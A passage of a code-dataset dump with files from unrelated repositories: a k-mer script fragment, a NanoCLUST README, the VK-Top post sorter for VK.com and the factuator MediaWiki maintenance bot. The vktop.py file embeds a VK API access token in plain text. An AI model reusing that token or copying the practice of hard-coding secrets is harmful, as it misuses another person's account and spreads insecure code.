build_args_for_kmer_calc(read_num, target_range, args, read_id, seq, k, combined_kmers, lengths_d, count, frac):\n status = \"keep going\"\n if read_num>=target_range[0] and read_num<=target_range[1]:\n\n # if read_num%1000==0: print(\"Loading...\",target_range, read_num)\n\n args.append( (read_id, seq, k, combined_kmers, read_num, count, frac) )\n lengths_d[read_id] = len(seq)\n elif read_num>target_range[1]:\n status = \"over\"\n return args,status\n\ndef launch_seq_kmers_pool( fastx, ftype, k, threads, target_range, combined_kmers, count, frac ):\n \n args = []\n lengths_d = {}\n\n if ftype==\"fastq\":\n for read_num, (read_id, seq, qual) in enumerate(FastqGeneralIterator(open(fastx))):\n args,status = build_args_for_kmer_calc(read_num, target_range, args, read_id, seq, k, combined_kmers, lengths_d, count, frac)\n if status==\"over\":\n break\n\n elif ftype==\"fasta\":\n for read_num, (read_id, seq) in enumerate(SimpleFastaParser(open(fastx))):\n args,status = build_args_for_kmer_calc(read_num, target_range, args, read_id, seq, k, combined_kmers, lengths_d, count, frac)\n if status==\"over\":\n break\n \n results = launch_pool( threads, calc_seq_kmer_freqs, args )\n \n return dict(results), lengths_d\n\ndef print_comp_vectors(read_num, target_range, comp_vectors, read_id, lengths_d):\n status = \"keep going\"\n if read_num>=target_range[0] and read_num<=target_range[1]:\n\n # if read_num%1000==0: print(\"writing...\",target_range, read_num)\n comp_vec_str = \"\\t\".join( map(lambda x: str(round(x,4)), comp_vectors[read_id]))\n print(\"%s\\t%i\\t%s\" % (read_id.split(\" \")[0], lengths_d[read_id], comp_vec_str))\n elif read_num>target_range[1]:\n status = \"over\"\n return status\n\ndef write_output( fastx, ftype, comp_vectors, lengths_d, target_range ):\n\n if ftype==\"fastq\":\n for read_num, (read_id, seq, qual) in enumerate(FastqGeneralIterator(open(fastx))):\n status = print_comp_vectors(read_num, target_range, comp_vectors, read_id, lengths_d)\n if status==\"over\":\n break\n\n elif ftype==\"fasta\":\n for read_num, (read_id, seq) in enumerate(SimpleFastaParser(open(fastx))):\n status = print_comp_vectors(read_num, target_range, comp_vectors, read_id, lengths_d)\n if status==\"over\":\n break\n\ndef get_n_reads(fastx, ftype):\n n_lines = 0\n with open(fastx) as f:\n for i, l in enumerate(f):\n n_lines += 1\n \n if ftype==\"fastq\":\n n_reads = len([read_tup for read_tup in FastqGeneralIterator(open(fastx))])\n elif ftype==\"fasta\":\n n_reads = len([read_tup for read_tup in SimpleFastaParser(open(fastx))])\n return n_reads\n\ndef check_input_format(fastx):\n for line in open(fastx).readlines():\n break\n\n if line[0]==\"@\":\n ftype = \"fastq\"\n elif line[0]==\">\":\n ftype = \"fasta\"\n else:\n raise(\"Unexpected file type! 
Only *.fasta, *.fa, *.fsa, *.fna, *.fastq, and *.fq recognized.\")\n return ftype\n\ndef main(args):\n ftype = check_input_format(args.qced_reads)\n n_reads = get_n_reads(args.qced_reads, ftype)\n\n chunk_n_reads = 5000\n\n all_kmers = build_all_kmers(args.k)\n combined_kmers = combine_kmers_list(all_kmers)\n\n print(\"read\\tlength\\t%s\" % \"\\t\".join(combined_kmers))\n\n read_chunks = list(chunks(range(n_reads), chunk_n_reads))\n\n for chunk in tqdm(read_chunks):\n target_range = (chunk[0], chunk[-1])\n \n comp_vectors,lengths_d = launch_seq_kmers_pool( args.qced_reads, \\\n ftype, \\\n args.k, \\\n args.threads, \\\n target_range, \\\n combined_kmers, \\\n args.count, \\\n args.frac )\n write_output( args.qced_reads, ftype, comp_vectors, lengths_d, target_range )\n\nif __name__==\"__main__\":\n args = parse_args()\n\n main(args)"
},
{
"alpha_fraction": 0.7400000095367432,
"alphanum_fraction": 0.7649999856948853,
"avg_line_length": 27.571428298950195,
"blob_id": "8860ec30606d53f8de326db97c817cb4230ed59a",
"content_id": "7c4c818832a382d3d49ce8e9c098399ae9c6dd2b",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 200,
"license_type": "permissive",
"max_line_length": 70,
"num_lines": 7,
"path": "/docs/README.md",
"repo_name": "genomicsITER/NanoCLUST",
"src_encoding": "UTF-8",
"text": "# nf-core/nanoclust: Documentation\n\nThe nf-core/nanoclust documentation is split into the following files:\n\n1. [Introduction](index.md)\n3. [Usage](2usage.md)\n4. [Pipeline output](3pipeline_output.md)\n"
}
] | 19 |
kashamalasha/VK-Top | https://github.com/kashamalasha/VK-Top | b269a2896f1ceee50815ceb5f875fb93d9cddb9f | 02f565b4439319c3f72d3a5e0c4dc90fb072b001 | 4843aec160b240431f9368fe5ef96601cc526687 | refs/heads/master | 2020-12-27T09:36:39.096806 | 2016-03-10T21:02:44 | 2016-03-10T21:02:44 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6135593056678772,
"alphanum_fraction": 0.6203389763832092,
"avg_line_length": 25.81818199157715,
"blob_id": "2c62ba56911f48ab1e157a88d07b5fa14006fa95",
"content_id": "8e33c69c6058c1e5f08ba6ad129908b9eb0517cc",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 590,
"license_type": "permissive",
"max_line_length": 75,
"num_lines": 22,
"path": "/setup.py",
"repo_name": "kashamalasha/VK-Top",
"src_encoding": "UTF-8",
"text": "from setuptools import setup\nsetup(\n name = 'vktop',\n packages = ['vktop'],\n version = '1.1',\n description = 'Sort posts of any page at VK.com',\n author = 'Dmitry Yutkin',\n author_email = '[email protected]',\n url = 'https://github.com/yutkin/VK-Top',\n download_url = 'https://github.com/yutkin/VK-Top/tarball/1.1',\n include_package_data=True,\n license='MIT',\n keywords = ['vk.com', 'vk', 'downloader', 'posts', 'social', 'networks'],\n classifiers = [],\n entry_points=dict(\n console_scripts=[\n 'vktop=vktop.vktop:main'\n ]\n ),\n install_requires=['requests'],\n platforms=['any'],\n)\n"
},
{
"alpha_fraction": 0.5991649031639099,
"alphanum_fraction": 0.6482254862785339,
"avg_line_length": 24.891891479492188,
"blob_id": "ab00ce3b546072906dfd70083615463f5fad3183",
"content_id": "956cb027db236ae3ecb613884c4250163cfb48e7",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 958,
"license_type": "permissive",
"max_line_length": 92,
"num_lines": 37,
"path": "/README.md",
"repo_name": "kashamalasha/VK-Top",
"src_encoding": "UTF-8",
"text": "## Installation\n`pip install vktop`\n\n##Dependencies\n- [Requests]\n\n##Help\n```\nusage: vktop.py [-h] [-l | -r] [-t TOP] [-d DAYS] url\n\nSort posts of any public availabe page at VK.com.\nGithub: https://github.com/yutkin/VK-Top\n\nPossible types of input URLs:\n- https://vk.com/page_name\n- http://vk.com/club12345\n- public1234567\n- id1234567\n- event1234567\n\npositional arguments:\n url target page\n\noptional arguments:\n -h, --help show this help message and exit\n -l, --likes sort posts by likes (by default)\n -r, --reposts sort posts by reposts\n -t TOP, --top TOP number of showing posts. (10 by default)\n -d DAYS, --days DAYS last period (in days) for post processing. (all period\n by default)\n\n```\n##Usage example\n![alt text][example]\n\n[example]: http://s11.postimg.org/5xs9hakk3/Screen_Shot_2016_01_09_at_00_05_24.png \"Example\"\n[Requests]: https://github.com/kennethreitz/requests\n"
},
{
"alpha_fraction": 0.5623037815093994,
"alphanum_fraction": 0.5760528445243835,
"avg_line_length": 31.524648666381836,
"blob_id": "5c26d8558f6b6c55cccff7cd5f67fb6118b7da3e",
"content_id": "7f55ebd3d1d2329a05286516cc83cd605b70e7f1",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9237,
"license_type": "permissive",
"max_line_length": 135,
"num_lines": 284,
"path": "/vktop/vktop.py",
"repo_name": "kashamalasha/VK-Top",
"src_encoding": "UTF-8",
"text": "#!/usr/local/bin/python\n\n# The MIT License (MIT)\n#\n# Copyright (c) 2016 Yutkin Dmitry\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in all\n# copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\nimport argparse\nfrom datetime import datetime, timedelta\nimport json\nimport sys\nimport requests\nimport time\nimport re\nimport textwrap\n\n\nAPP_DESCRIPTION = textwrap.dedent('''\n Sort posts of any public availabe page at VK.com.\n Github: https://github.com/yutkin/VK-Top\n\n Possible types of input URLs:\n - https://vk.com/page_name\n - http://vk.com/club12345\n - public1234567\n - id1234567\n - event1234567\n ''')\n\nLIKES = 'likes'\nREPOSTS = 'reposts'\n\nACCESS_TOKEN = 'ff8faef07fe2666af8743cd4384fa595f85927d6c39dc4360e831a149d9f956710be447816dd857d2dee7'\n\nAPI_URL = 'https://api.vk.com/method/'\nAPI_V = 5.37\n\nINVALID_URL = ('{url} - invalid url address')\nNEGATIVE_ARGUMENT = ('{argument} - should be greater or equal to 0')\nMANY_REQUESTS = 6\nHIDDEN_WALL = 13\n\n\nTXT_ID_PTRN = r'(?:https?:\\/\\/)(?:vk.com\\/(?!club|public|id|event))(?P<id>(?![_.])(?!club|public|id|event)[a-z0-9_.]*[a-z][a-z0-9_.]*)'\nNUM_ID_PTRN = r'^(?:https?:\\/\\/)?(?:vk.com\\/)?(?P<type>club|public|id|event)(?P<id>\\d+)$'\nTXT_ID_REGEXP = re.compile(TXT_ID_PTRN)\nNUM_ID_REGEXP = re.compile(NUM_ID_PTRN)\n\nclass HiddenWall(BaseException):\n \"\"\" Dummy exception \"\"\"\n pass\n\n\nclass PageNotAvailable(BaseException):\n \"\"\" Dummy exception \"\"\"\n pass\n\n\ndef url_validator(arg):\n \"\"\" Checks correctness of url argument \"\"\"\n arg = arg.lower()\n\n # If url something like https://vk.com/textual_id\n matched_txt_id = TXT_ID_REGEXP.match(arg)\n if matched_txt_id:\n url = matched_txt_id.groupdict()\n url['type'] = 'symbolic'\n return url\n\n # If url something like https://vk.com/id123456\n matched_numeric_id = NUM_ID_REGEXP.match(arg)\n if matched_numeric_id:\n return matched_numeric_id.groupdict()\n\n raise argparse.ArgumentTypeError(\n INVALID_URL.format(url=arg))\n\n\ndef num_validator(arg):\n \"\"\" Checks numbers on negativity \"\"\"\n num = int(arg)\n if num >= 0:\n return num\n else:\n raise argparse.ArgumentTypeError(\n NEGATIVE_ARGUMENT.format(argument=arg))\n\n\ndef parse_args():\n \"\"\" Parses input arguments \"\"\"\n parser = argparse.ArgumentParser(description=APP_DESCRIPTION,\n formatter_class=argparse.RawDescriptionHelpFormatter)\n\n parser.add_argument('url',\n action='store',\n default=None,\n help='target page',\n type=url_validator)\n\n compar_key = parser.add_mutually_exclusive_group()\n\n 
compar_key.add_argument('-l',\n '--likes',\n help='sort posts by likes (by default)',\n action='store_true',\n default=True)\n\n compar_key.add_argument('-r',\n '--reposts',\n help='sort posts by reposts',\n action='store_true')\n\n parser.add_argument('-t',\n '--top',\n help='number of showing posts. (10 by default)',\n default=10,\n type=num_validator)\n\n parser.add_argument('-d',\n '--days',\n type=int,\n default=-1,\n help='last period (in days) for post processing. '\n '(all period by default)')\n\n return parser.parse_args()\n\n\ndef get_page_id(url):\n \"\"\" Returns page's numeric ID \"\"\"\n if url['type'] not in ['id', 'public', 'event', 'club']:\n params = {'screen_name': url['id']}\n request = requests.get(API_URL + 'utils.resolveScreenName?',\n params=params)\n response = json.loads(request.text)['response']\n\n if response:\n if response['type'] == 'user':\n return response['object_id']\n else:\n return -response['object_id']\n else:\n raise PageNotAvailable(url['id'] + ' is not available')\n elif url['type'] == 'id':\n return int(url['id'])\n else:\n return -int(url['id'])\n\n\ndef recieve_posts(page_id, last_days, reposts):\n \"\"\"\n Returns posts from :page_id: that were posted not earlier\n than :last_days: ago\n \"\"\"\n deadline = datetime.now() - timedelta(days=last_days)\n unix_stamp = int(deadline.strftime(\"%s\"))\n\n if reposts:\n compar_key = REPOSTS\n else:\n compar_key = LIKES\n\n params = {'access_token': ACCESS_TOKEN,\n 'id': page_id,\n 'compar_key': compar_key,\n 'deadline': unix_stamp if last_days != -1 else last_days\n }\n received_posts = []\n\n offset = 0\n ONGOING = True\n while ONGOING:\n params['offset'] = offset\n response = json.loads(requests.post(\n API_URL + 'execute.getPostsNew?', params=params).text)\n\n if 'error' in response:\n error = response['error']['error_code']\n if error == MANY_REQUESTS:\n continue\n if error == HIDDEN_WALL:\n raise HiddenWall('Wall is closed for outside view')\n raise RuntimeError(response['error']['error_msg'])\n\n # Interrupt loop when all posts were received\n if not response['response']:\n break\n\n received_data = response['response']\n for chunk in received_data:\n chunk_size = len(chunk['ids'])\n for i in range(chunk_size):\n post = dict()\n post['date'] = datetime.fromtimestamp(chunk['dates'][i])\n if chunk[compar_key][i] and (last_days == -1\n or post['date'].year >= deadline.year\n and post['date'].month >= deadline.month\n and post['date'].day >= deadline.day):\n\n post['id'] = chunk['ids'][i]\n post[compar_key] = chunk[compar_key][i]\n received_posts.append(post)\n if 'stop' in chunk:\n ONGOING = False\n break\n offset += 1\n\n return received_posts\n\n\ndef sort_posts(posts, reposts=False):\n \"\"\" Sort posts by specified parameter \"\"\"\n if reposts:\n return sorted(posts, key=lambda post: -post['reposts'])\n else:\n return sorted(posts, key=lambda post: -post['likes'])\n\n\ndef main():\n \"\"\" Main entry point for execution as a program \"\"\"\n\n init_point = time.time()\n args = parse_args()\n try:\n page_id = get_page_id(args.url)\n print('Downloading posts. 
'\n 'This may take some time, be patient...')\n received_posts = recieve_posts(page_id, args.days, args.reposts)\n received_posts = sort_posts(received_posts, args.reposts)\n except (PageNotAvailable, HiddenWall) as error:\n print('{0}: error: {1}'.format(sys.argv[0], error))\n return\n except KeyboardInterrupt:\n print('Exiting...')\n return\n except Exception:\n print('{0}: error: {1}'.format(sys.argv[0], 'Unknown error'))\n return\n\n\n post_count = len(received_posts)\n if args.top and post_count:\n num_posts_for_showing = post_count if args.top > post_count else args.top\n elif post_count:\n num_posts_for_showing = post_count\n else:\n return\n\n max_url_width = len(str(max(received_posts, key=lambda x: x['id'])['id'])) + \\\n len('https://vk.com/wall_') + len(str(page_id))\n\n print('Elapsed time: {:.2f} sec.'.format(time.time() - init_point))\n for i, post in enumerate(received_posts[:num_posts_for_showing]):\n link = 'https://vk.com/wall{0}_{1}'.format(page_id, post['id'])\n print('{num:>{num_width}} {url:<{url_width}} {date:<14} {type}: {count:,}'.format(\n num=str(i+1)+')',\n num_width=len(str(num_posts_for_showing))+1,\n url=link,\n url_width=max_url_width + 4,\n date=str(post['date'])[:10],\n type='Reposts' if args.reposts else 'Likes',\n count=post['reposts'] if args.reposts else post['likes'])\n )\n\nif __name__ == '__main__':\n main()\n"
}
] | 3 |
uwmadison-chm/factuator | https://github.com/uwmadison-chm/factuator | 4c270ae713fca47a390544421912f70726dfb0f0 | 83e2dc797669da7e58f89b4b88f02f21c5a46c17 | 91de6eb270183c541aaa1ff17b99fc6e29e14744 | refs/heads/master | 2022-12-13T14:16:04.742057 | 2022-08-18T16:01:40 | 2022-08-18T16:01:40 | 175,715,761 | 0 | 1 | MIT | 2019-03-14T23:33:59 | 2021-12-30T00:39:50 | 2022-12-08T05:10:34 | Python |
[
{
"alpha_fraction": 0.7025683522224426,
"alphanum_fraction": 0.7100248336791992,
"avg_line_length": 23.139999389648438,
"blob_id": "551032efcb847ba08cd2d25a8d91400cbd139ae4",
"content_id": "cf49f05f0e03a2be04604758905ce3ee42702cdc",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1207,
"license_type": "permissive",
"max_line_length": 84,
"num_lines": 50,
"path": "/README.md",
"repo_name": "uwmadison-chm/factuator",
"src_encoding": "UTF-8",
"text": "# factuator\n\nA Python bot to help maintain fancier features of the MOTHER wiki at CHM.\n\n## Requirements\n\n python3 -m virtualenv .venv\n source .venv/bin/activate\n pip3 install -r requirements.txt\n\n## Kerberos security\n\nYou'll need to `kinit` to get a token.\n\n## Examples\n\nFactuator can be loud, just add `-v` for info messages or `-vv` for debug logging.\n\nCurrently, it warns you if it's actually updating things, and it tries to only \npost changes if things are different.\n\n### Update study pages\n\nUpdate all `{{Study}}` infobox templates on Category:Study pages.\n\n python3 factuator.py --study\n\n### Media links\n\nReplace all `[[:File:Name.pdf]]` and `[[File:Name.pdf]]` style links with \n`[[Media:Name.pdf]]` to make them link directly to the file.\n\nOn a page:\n\n python3 factuator.py --medialinks-page User:Myname\n\nOn multiple pages:\n\n python3 factuator.py --medialinks-page \"Page 1\" --medialinks-page \"Page Title 2\"\n\nOn all pages in a category:\n\n python3 factuator.py --medialinks-category \"Self Report Measure\"\n\n### Rename category\n\nReplace all `[[Category:A]]` with `[[Category:B]]`. (Does not currently check \nfor `[[:Category:A]]`.)\n\n python3 factuator.py --rename-category A B\n"
},
{
"alpha_fraction": 0.5377826690673828,
"alphanum_fraction": 0.5391616225242615,
"avg_line_length": 38.41304397583008,
"blob_id": "b500a39aa1be2bc9d1427982511a1c2ba3aabf82",
"content_id": "7a6c863042784d302b15ab27099cfec3f16e7f43",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3626,
"license_type": "permissive",
"max_line_length": 148,
"num_lines": 92,
"path": "/redirectlinks.py",
"repo_name": "uwmadison-chm/factuator",
"src_encoding": "UTF-8",
"text": "import mwclient\nimport mwparserfromhell\nimport logging\nimport re\nimport sys\n\ndef fix(page):\n text = page.text()\n p = mwparserfromhell.parse(text)\n has_bad_link = False\n red_link = \"\"\n if \"#REDIRECT\" in p:\n logging.info(f\"`{page.name}` is an empty redirect page, fixing link...\")\n red = p.filter_wikilinks()\n has_bad_link = True\n for link in red:\n red_link = link.title\n\n return red_link, has_bad_link\n \ndef run_category(mother, category_name):\n category = mother.categories[category_name]\n for page in category:\n run_page(mother, page)\n\n\ndef run_pages(mother, pages):\n for title in pages:\n page = mother.pages[title]\n run_page(mother, page)\n\n\ndef run_page(mother, page):\n oldtext = page.text()\n p = mwparserfromhell.parse(oldtext)\n link_titles = []\n \n # Replaces links to redirected pages with proper link\n for link in p.filter_wikilinks():\n link_title = str(link.title)\n link_page = mother.pages[link_title]\n red_link, has_bad_link = fix(link_page)\n if has_bad_link:\n link_titles.append(link_title)\n p.replace(link.title, red_link)\n newpage = str(p)\n \n if oldtext != newpage:\n logging.warning(\"Updating %s page, change detected\\n\", page.name)\n page.save(newpage, \"Automated edit to make links to redirected pages link to proper page instead\")\n \n # Optional: Look for same redirect pages on entire MOTHER wiki. Replaces appropriate links and deleting redirect pages when no longer being used\n if len(link_titles) > 0 :\n # TODO: disabling for now\n return\n replace_all = input(\"Search the rest of the Wiki for these redirected links? [y/n]:\")\n while (len(replace_all) >= 1):\n \n if replace_all.upper() == 'Y':\n link_index = 0\n for link_index in range(len(link_titles)):\n page_link = mother.pages[link_titles[link_index]]\n links_here = page_link.backlinks(filterredir = 'all', redirect = True, limit = None)\n new_index = 0\n for page in links_here:\n bad_page = mother.pages[page.name]\n badtext = bad_page.text()\n bp = mwparserfromhell.parse(badtext)\n for link in bp.filter_wikilinks():\n for new_index in range(len(link_titles)):\n if link.title == (link_titles[new_index]):\n bp.replace(link.title, red_link)\n newpage = str(bp) \n \n if badtext != newpage:\n logging.warning(\"Updating %s page, change detected\\n\", bad_page.name)\n page.save(newpage, \"Automated edit to make links to redirected pages link to proper page instead\")\n \n link_index = 0\n for link_index in range(len(link_titles)):\n link_page = mother.pages[link_titles[link_index]]\n logging.warning(\"Deleting %s page, no longer being used\\n\", link_titles[link_index])\n link_page.delete()\n \n break\n \n elif replace_all.upper() == 'N': \n break\n \n else:\n print(\"\\nPlease enter a proper response.\")\n replace_all = input(\"Search the rest of the Wiki for these redirected links? [y/n]: \")\n"
},
{
"alpha_fraction": 0.680497944355011,
"alphanum_fraction": 0.680497944355011,
"avg_line_length": 44.1875,
"blob_id": "18c81aad0ac5cc58a7edec4c3d053371018eb2f0",
"content_id": "5988a02716a4fb7587f6d38aa9c8b6455666b1f0",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 723,
"license_type": "permissive",
"max_line_length": 120,
"num_lines": 16,
"path": "/renamecategory.py",
"repo_name": "uwmadison-chm/factuator",
"src_encoding": "UTF-8",
"text": "import mwclient\nimport mwparserfromhell\nimport logging\nimport traceback\n\ndef run(mother, old_category_name, new_category_name):\n category = mother.categories[old_category_name]\n for page in category:\n oldtext = page.text()\n newtext = oldtext.replace(f\"[[Category:{old_category_name}]]\", f\"[[Category:{new_category_name}]]\")\n\n if oldtext.strip() != newtext.strip():\n logging.warning(f\"Updating page {page.name}, Category:{old_category_name} to Category:{new_category_name}\")\n page.save(newtext, f\"Automated edit to update Category:{old_category_name} to Category:{new_category_name}\")\n else:\n logging.info(\"Not updating page %s, text identical\", page.name)\n"
},
{
"alpha_fraction": 0.5237822532653809,
"alphanum_fraction": 0.5243552923202515,
"avg_line_length": 27.129032135009766,
"blob_id": "17dcc289b3885ac0bc8bbc591822cc6cc188f7b2",
"content_id": "81dd9c91c3fccb96d13b8b9d50b5b2021b2f8c35",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1745,
"license_type": "permissive",
"max_line_length": 71,
"num_lines": 62,
"path": "/studyreport.py",
"repo_name": "uwmadison-chm/factuator",
"src_encoding": "UTF-8",
"text": "import mwclient\nimport mwparserfromhell\nimport logging\nimport re\nimport csv\nfrom utilities import study_template\n\ndef fetch(page, template, key):\n thing = \"\"\n try:\n thing = template.get(key).value.rstrip()\n except ValueError:\n logging.warning(f\"No '{key}' on study page {page.name}\")\n pass\n return thing\n\ndef run(mother):\n category = mother.categories['Study']\n\n with open('studyreport.csv', 'w') as csvfile:\n writer = csv.writer(csvfile)\n columns = [\n \"Study\",\n \"AKA\",\n \"Short Description\",\n \"Study Status\",\n \"Active\",\n \"In Quarterly Progress Report\",\n \"Verified for Progress Report Date\",\n \"Funded Fully or Partially Through RSP\",\n \"CHM Website\",\n \"Start Date\",\n \"End Date\",\n \"Planning Start Date\",\n \"Piloting Start Date\",\n \"Collecting Start Date\",\n \"Projected Enrollment\",\n \"Current Enrollment\",\n \"IRB Number\",\n \"Grant Number\",\n \"Funding Source\",\n \"ARROW URL\",\n \"NIH RePORTER ID\",\n \"ClinicalTrials.Gov\",\n \"JARVIS ID\",\n \"PIs\",\n \"Project Manager\",\n \"Current Contact\",\n \"Project Links\",\n ]\n\n writer.writerow(columns)\n for page in category:\n logging.debug(\"Loading study\", page.name)\n text = page.text()\n p = mwparserfromhell.parse(text)\n\n template = study_template(p)\n column_values = [fetch(page, template, x) for x in columns]\n column_values[0] = page.name\n\n writer.writerow(column_values)\n\n"
},
{
"alpha_fraction": 0.5189393758773804,
"alphanum_fraction": 0.7196969985961914,
"avg_line_length": 16.600000381469727,
"blob_id": "3ea7e0b1460cff0660549a7a765298dc7df97bde",
"content_id": "29fc54ec53180bebc2e7a42e009c0f4d77e1ecea",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 264,
"license_type": "permissive",
"max_line_length": 24,
"num_lines": 15,
"path": "/requirements.txt",
"repo_name": "uwmadison-chm/factuator",
"src_encoding": "UTF-8",
"text": "certifi==2019.3.9\nchardet==3.0.4\ncoloredlogs==10.0\nhumanfriendly==4.18\nidna==2.8\nmwclient==0.10.1\nmwparserfromhell==0.5.4\noauthlib==3.0.1\npsycopg2==2.8.2\npython-dateutil==2.8.0\nrequests==2.22.0\nrequests-oauthlib==1.2.0\nsix==1.12.0\nurllib3>=1.26.7\ngoogleapi>=0.1.0\n"
},
{
"alpha_fraction": 0.613892674446106,
"alphanum_fraction": 0.615471363067627,
"avg_line_length": 39.29999923706055,
"blob_id": "065841e2d253b81a9f98cb114188bd4967e26ac2",
"content_id": "2e72bdb6b4a5dfe3e1b738fa5b8c94b856e0cc87",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4434,
"license_type": "permissive",
"max_line_length": 188,
"num_lines": 110,
"path": "/studylibrary.py",
"repo_name": "uwmadison-chm/factuator",
"src_encoding": "UTF-8",
"text": "import mwclient\nimport mwparserfromhell\nimport logging\nimport re\nfrom utilities import study_template\nfrom jarvis import Jarvis\n\ndef run(mother):\n category = mother.categories['Study']\n all_studies = set()\n status = {}\n has_status = set()\n missing_status = set()\n missing_jarvis = set()\n jarvis_ids = set()\n\n for page in category:\n logging.debug(\"Checking study\", page.name)\n all_studies.add(page.name)\n text = page.text()\n p = mwparserfromhell.parse(text)\n template = study_template(p)\n if template:\n if template.has(\"Study Status\"):\n s = template.get(\"Study Status\").value.strip()\n if s == \"\": continue\n words = re.split(r',\\s*', s)\n for c in words:\n status[c] = status.get(c, set())\n status[c].add(page.name)\n has_status.add(page.name)\n\n if not template.has(\"JARVIS ID\") or \\\n template.get(\"JARVIS ID\").value.strip() == \"\":\n missing_jarvis.add(page.name)\n else:\n jarvis_ids.add(int(template.get(\"JARVIS ID\").value.strip()))\n\n if not page.name in has_status:\n missing_status.add(page.name)\n\n logging.debug(\"Got status: \", status)\n\n # Now statuses contains a hash of construct -> list of pages.\n # NOTE: This re-uses MediaWiki's category CSS classes to get three-column display. Maybe weird to do that?\n oldtext = category.text()\n cat = mwparserfromhell.parse(oldtext)\n sections = cat.get_sections()\n title = \"== Sorted by Study Status ==\"\n newtext = title + \"\\n\\nPlease note: this section is created automatically based on the status in each study's infobox. To edit, go to the study's page and choose 'Edit with form'.\\n\\n\"\n newtext += \"<div class='mw-category'>\"\n\n # Build up an index by status\n # Sort by certain rules\n sort_order = [\n \"In Development\", \"Piloting\", \"Collecting\", \"Data Collection Complete\", \n \"Analyzing\", \"Publishing\", \"IRB Closed\"]\n for k in sort_order:\n if not k in status:\n continue\n newtext += \"<div class='mw-category-group'><h3>\" + k + \"</h3>\\n\"\n for study in sorted(list(status[k])):\n newtext += \"* [[\" + study + \"]]\\n\"\n newtext += \"</div>\"\n\n # List out things that are missing statuses\n newtext += \"<div class='mw-category-group'><h3>No statuses listed</h3>\\n\"\n for m in missing_status:\n newtext += \"* [[\" + m + \"]]\\n\"\n newtext += \"</div>\"\n\n newtext += \"</div>\\n\\n\"\n\n # Replace the \"Sorted by Study Status\" section with our new text\n old_section = cat.get_sections(matches = \"Sorted by Study Status\")[0]\n cat.replace(old_section, newtext)\n newpage = str(cat)\n\n if oldtext != newpage:\n logging.warning(\"Updating study category page, change detected\")\n category.save(newpage, \"Automated edit to build status categories on study library\")\n\n # Now we use the statuses and dates we pulled to edit the \"missing Jarvis\" and \"studies not edited for the longest\"\n missing = mother.pages['Study pages missing JARVIS IDs']\n oldtext = missing.text()\n newpage = \"This page is automatically generated. See also [[JARVIS IDs missing study pages]]\\n\\n\"\n newpage += \"== Pages missing JARVIS IDs ==\\n\\n\"\n for page in sorted(missing_jarvis):\n newpage += f\"* [[{page}]]\\n\"\n\n if oldtext != newpage:\n logging.warning(\"Updating missing JARVIS IDs page, change detected\")\n missing.save(newpage, \"Automated edit\")\n\n # Now we build the opposite thing\n missing = mother.pages['JARVIS IDs missing study pages']\n oldtext = missing.text()\n newpage = \"This page is automatically generated and only includes more recent entries in JARVIS. 
See also [[Study pages missing JARVIS IDs]]\\n\\n\"\n newpage += \"== JARVIS IDs missing study pages ==\\n\\n\"\n\n j = Jarvis()\n all_studies = j.select(\"SELECT id, folder, name, created_at FROM studies ORDER BY created_at DESC LIMIT 30\")\n for s in all_studies:\n jarvis_id, folder, name, created_at = s\n if not jarvis_id in jarvis_ids:\n newpage += f\"* ID {jarvis_id} in /study/{folder}: \\\"{name}\\\" (created at {created_at})\\n\"\n\n if oldtext != newpage:\n logging.warning(\"Updating missing study pages page, change detected\")\n missing.save(newpage, \"Automated edit\")\n\n"
},
{
"alpha_fraction": 0.6195150017738342,
"alphanum_fraction": 0.6200923919677734,
"avg_line_length": 23.02777862548828,
"blob_id": "a0bfa8d6382a04994da648265660d2b0d5fb81b4",
"content_id": "121b2be42ffee8c5bdd06e0f6dd7f50fa5c31a7f",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1732,
"license_type": "permissive",
"max_line_length": 83,
"num_lines": 72,
"path": "/selfreport.py",
"repo_name": "uwmadison-chm/factuator",
"src_encoding": "UTF-8",
